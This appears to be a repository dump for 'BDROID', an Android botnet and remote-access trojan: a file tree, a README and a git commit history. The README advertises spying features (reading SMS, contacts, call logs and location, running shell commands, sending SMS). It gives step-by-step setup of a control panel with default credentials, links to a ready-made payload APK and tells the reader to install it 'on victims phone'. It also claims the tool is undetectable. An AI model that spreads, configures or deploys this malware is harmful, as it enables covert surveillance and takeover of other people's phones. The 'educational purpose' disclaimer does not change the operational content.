======================: FILES :======================
BDROID
├── build
│   ├── asset-manifest.json
│   ├── favicon.ico
│   ├── index.html
│   ├── logo192.png
│   ├── logo512.png
│   ├── manifest.json
│   ├── robots.txt
│   └── vulnerability.csv
├── db
│   └── database.py
├── __init__.py
├── main.py
├── README.md
├── requirements.txt
├── routers
│   ├── auth
│   │   ├── auth.py
│   │   └── __init__.py
│   ├── client
│   │   ├── client.py
│   │   └── __init__.py
│   ├── command
│   │   ├── command.py
│   │   └── __init__.py
│   ├── __init__.py
│   └── notification
│       ├── __init__.py
│       └── notification.py
├── static
│   ├── css
│   │   ├── main.101b48ee.css
│   │   └── main.101b48ee.css.map
│   ├── js
│   │   ├── 787.e649ba96.chunk.js
│   │   ├── 787.e649ba96.chunk.js.map
│   │   ├── main.58405be5.js
│   │   ├── main.58405be5.js.LICENSE.txt
│   │   └── main.58405be5.js.map
│   └── media
│       ├── 2ee9fc9d-72f3-41a9-ae0b-387aa1f6cbdd (1).ad1baec92f1a882ed917.jpeg
│       └── Cyberattack-cuate.a120d44c86141a29d90b578255e3ea3a.svg
└── test
    ├── __init__.py
    └── test.py

12 directories, 33 files
======================: README CONTENT :======================
<p align="center"><a href="https://github.com/botolmehedi/BDROID"><img title="BDROID" src="https://i.ibb.co/PgFYh4K/20220325-110329.png"></a>

<p align="center">
<a href="https://github.com/botolmehedi"><img title="Author" src="https://img.shields.io/badge/By-Botol--Baba-red.svg?style=for-the-badge&logo=github"></a>
</p>

<h1 align="center">B-DROID BOTNET</h1>
<p align="center">      SIMPLE ANDROID BOTNET | ANDROID RAT</p>

## About

It's easy to use. This android botnet work without port forwarding, vps and android studio. This is a fully fresh & new undetectable Android Botnet. This botnet work on Android 5 to 10 Any Devices.

## Features

* Show Contact List
* Show SMS List
* Show running Services
* Show Device Location
* Show Call Logs
* Run Shell Command
* Change Wallpaper
* Send SMS
* Make Call
* Get Installed Apps
* Download File
* Read Notification
* Auto-Start

## Tasted on

Android 5 to Android 10. Working Without Any Error.

## Setup Tutorial [CONTROL PANEL]

* Create a New Account here [Deta.sh](https://deta.sh)

* Now Deploy To Deta : 
[![Deploy](https://button.deta.dev/1/svg)](https://go.deta.dev/deploy?repo=https://github.com/BotolMehedi/BDROID)

* After Successfully Deployed, Copy That Link. This is Your Control Panel. You Can Control All of Your Victims Devices From Here.
<a href="https://github.com/botolmehedi/BDROID"><img title="BDROID" src="https://user-images.githubusercontent.com/64999484/160270463-cd7a4097-ee08-4181-b3d3-b91e2190c6e7.png"></a>

⭐ Control Panel Default Login
* User : botol
* Pass : baba

## Setup Tutorial [PAYLOAD]

⭐ Download This
* [Apk Editor Pro](https://apkmody.io/apps/apk-editor)
* [Bdroid Readymade Version](https://raw.githubusercontent.com/BotolMehedi/BotolMehedi/master/Bdroid.apk)

⭐ Payload Setup
* Open APK EDITOR PRO & Open with 'SELECT APK FILE'
* Find The 'Bdroid' Readymade Apk & Open with 'FULL EDIT' - ALL FILES
* Enable 'SMALI' in FILES.
* Search This keyword 'CONTROL PANEL LINK'
* Paste Yout Control Panel Link Here. example : https://xxxx.deta.dev
* Now Build/Save. 
~Your Binded APK is ready. Now Install this apk on victims phone.

<img title="Payload Setup Bdroid" src="https://user-images.githubusercontent.com/64999484/160757635-2260efb1-f0bf-4737-a3f3-780fb5409c1b.gif"/>

## Working Demo Video :
* [DEMO VIDEO TUTORIAL LINK](https://drive.google.com/file/d/14mVcHO-ME7QGXcQGvCAw7kVPhYEn-cY5/view?usp=drivesdk)

 https://user-images.githubusercontent.com/64999484/160759767-8ece8b43-6aee-40cf-8698-73922d248bf0.mp4

## [!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/botolbaba)
* BTC : 17CdkUHrPzoWg3B2TX8Nm7YkYZX7wreFQw

## Follow Me

* Youtube : [Subscribe Now](https://www.youtube.com/MasterTrick1)
* Website : [Visit Now](https://linktr.ee/botolbaba)
* Page : [Follow Us](https://www.facebook.com/TeamVVirus)
* Group : [Join Us](https://www.facebook.com/groups/231747098048450)
* Telegram : [Join Now](https://t.me/mastertrick2)
* Instagram : [Follow Me](https://www.instagram.com/MehtanOfficial)
* Twitter : [Follow Me](https://www.twitter.com/botolbaba)

## ThanksTo
```
• HackSec❤TearDroid
```

## Warning

***This is a reCoded/Modified/Shortcut Version of "TEARDROID by HackSec". I am not promoting any illegal activity here. This is purely for educational purpose only. i am not responsible if you use it for illegal purpose.***
====================== GIT HISTORY: ======================
95d9fdb HEAD@{0}: clone: from https://github.com/BotolMehedi/BDROID
commit 95d9fdb7367ce6b89dcd3456e5141f87b7d01246
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Mon May 9 15:26:37 2022 +0600

    Update README.md

commit ad11b4e4786bcbb3b18cc601e800bb8c72707c3b
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Mon May 9 15:26:16 2022 +0600

    Update README.md

commit 23c64ca21fa3b302e7d50033b2721b5b8649cc69
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Mon May 9 08:28:33 2022 +0600

    Update README.md

commit 4f65ecabaeb60c3a90a0fac2466f04fab87d133c
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Wed Mar 30 11:51:34 2022 +0600

    Update README.md

commit ef5754fd6ce5a26d3ad5496097ab0a653c1a4960
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Wed Mar 30 11:40:29 2022 +0600

    Update README.md

commit ea4c2cfce38806499ff79fa144bd0f7bdbf6be60
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Wed Mar 30 11:35:40 2022 +0600

    Update README.md

commit de2bc6e1bc92db455e853ddd7120fc27ff8602cc
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Mon Mar 28 22:06:33 2022 +0600

    Update README.md

commit e577c1b8076b41ff19e3d6f96666d33c2ccdd3fa
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Mon Mar 28 21:54:05 2022 +0600

    Add files via upload

commit 11cdd74700733a669e41e4152ff5f8f5ea6b1598
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Mon Mar 28 21:53:26 2022 +0600

    Delete main.58405be5.js

commit f9e1827d4672c674b1ad132a3a0f7f80c0f783f4
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Sun Mar 27 16:58:14 2022 +0600

    Update README.md

commit b2a694dba4d0fcd18660a27c8deeea2c4ddd7a4a
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Sun Mar 27 15:41:16 2022 +0600

    Update README.md

commit 8d9b3ec44635d77a8f9b48279b10940feb5eba5d
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Sun Mar 27 15:36:58 2022 +0600

    Update README.md

commit 937b58ccfb6bdf486d20bafe164e13760cf1d330
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Sun Mar 27 15:12:22 2022 +0600

    Update README.md

commit 924dbe29b4ea3b248e7b2657595438a329c26be1
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 20:16:03 2022 +0600

    Add files via upload

commit d9b46aa1aff5a2575bdf73a91d372ffb7a220dc4
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 20:10:59 2022 +0600

    Delete main.58405be5.js

commit a4a6bbecfd0c96869459e6e181b8f731ec2ea1f6
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 20:06:48 2022 +0600

    Update README.md

commit 37f767e393268fcd15be14c9eaec5cd6ccce5f7c
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 20:03:02 2022 +0600

    Update README.md

commit 53a2b2d205339c6c2fc6892bb0c50a5df877aaec
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 19:57:14 2022 +0600

    Update README.md

commit f2980f9b8460b92054b8d15b56f4caf7f6217923
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 19:56:08 2022 +0600

    Update README.md

commit 2b7da7ac7c6909e6edf4112490eb12324dd7f3b4
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 19:13:22 2022 +0600

    Update README.md

commit 35743e8cc769c26b8aed009a734a9bde8553c04a
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 18:29:07 2022 +0600

    Add files via upload

commit b76db304a5fe16f6ae87f91f5b8f0a9a91651cb5
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 18:28:44 2022 +0600

    Delete main.58405be5.js

commit 278ef77d25602379441fab20bf96e88196d7d34a
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 18:19:21 2022 +0600

    Add files via upload

commit f166458c39a1a3d45fb12746e92857f5ad14b13f
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 18:18:59 2022 +0600

    Delete main.58405be5.js

commit 41a5e06169916d3bec43c2baffba9cab0fd36eb0
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 18:09:19 2022 +0600

    Add files via upload

commit 5228276fa1887b433f6ed2bc50d0e694a3ce0e51
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 18:08:43 2022 +0600

    Delete main.58405be5.js

commit bc0a9ef7bab58729974ededb6db99c8afec0338f
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 17:06:52 2022 +0600

    Add files via upload

commit 870550cf1408b58456537bd9737532614e9b7acc
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 17:06:31 2022 +0600

    Delete main.58405be5.js

commit d3f7730bbf7de2252499e117c20b298b94dc9305
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 15:14:17 2022 +0600

    Add files via upload

commit 309b0c2395307c1838467b80531569b7c3dd07a5
Author: Mehedi Hasan Ariyan <64999484+BotolMehedi@users.noreply.github.com>
Date:   Fri Mar 25 15:13:42 2022 +0600

    Delete main.58405be5.js

commit c60da72bc0a4ef7f0da769dc01d9197b6fa46f07
Author: BotolMehedi <thebotolbaba@gmail.com>
Date:   Fri Mar 25 14:03:00 2022 +0600

    Latest
